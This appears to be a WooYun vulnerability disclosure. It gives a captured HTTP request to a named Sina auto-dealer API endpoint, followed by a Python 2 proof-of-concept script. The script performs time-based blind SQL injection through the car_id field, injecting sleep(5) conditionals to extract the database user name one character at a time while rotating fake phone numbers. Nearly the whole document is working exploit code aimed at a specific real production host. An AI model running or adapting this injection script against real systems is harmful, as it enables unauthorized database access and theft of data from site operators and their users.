WooYun.org

POST /new/index.php/api/xunjia/AjaxAskPrice HTTP/1.1
Host: weidealer.auto.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
info%5Bmobile%5D=13888888889&info%5Bprovince_id%5D=11&info%5Bcity_id%5D=1&info%5Bbrand_id%5D=95&info%5Bsub_brand_id%5D=1661&info%5Bcar_id%5D=18058&info%5Bxname%5D=false&info%5Bask_reffer%5D=67

#!/usr/bin/env python
# coding: UTF-8 （๑•̀ㅂ•́)و✧
__author__ = 'T1m0n'
import httplib, time
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'User-Agent': 'Mozilla/5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0',
    'Host': 'weidealer.auto.sina.com.cn',
    'Content-Type': 'application/x-www-form-urlencoded',
}
user = ''
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_'
i = 100
for x in range(1, 24):
    for payload in payloads:
        conn = httplib.HTTPConnection('weidealer.auto.sina.com.cn', 80)
        url = '/new/index.php/api/xunjia/AjaxAskPrice'
        start_time = time.time()
        number = '138345%05d' % i
        body = 'info[mobile]=' + number + '&info[province_id]=11&info[city_id]=1&info[brand_id]=95&info[sub_brand_id]=1661&info[car_id]=18058 AND (SELECT * FROM (SELECT'
        body += '(if(ascii(substr(user(),%d,1))=%d,sleep(5),1)' % (x, ord(payload))
        body += '))zkHd)-- mGEC&info[xname]=false&info[ask_reffer]=67'
        conn.request('POST', url, body, headers)
        res = conn.getresponse().read()
        conn.close()
        print '.',
        i += 1
        if time.time() - start_time > 5:
            print payload
            user += payload
            break
print user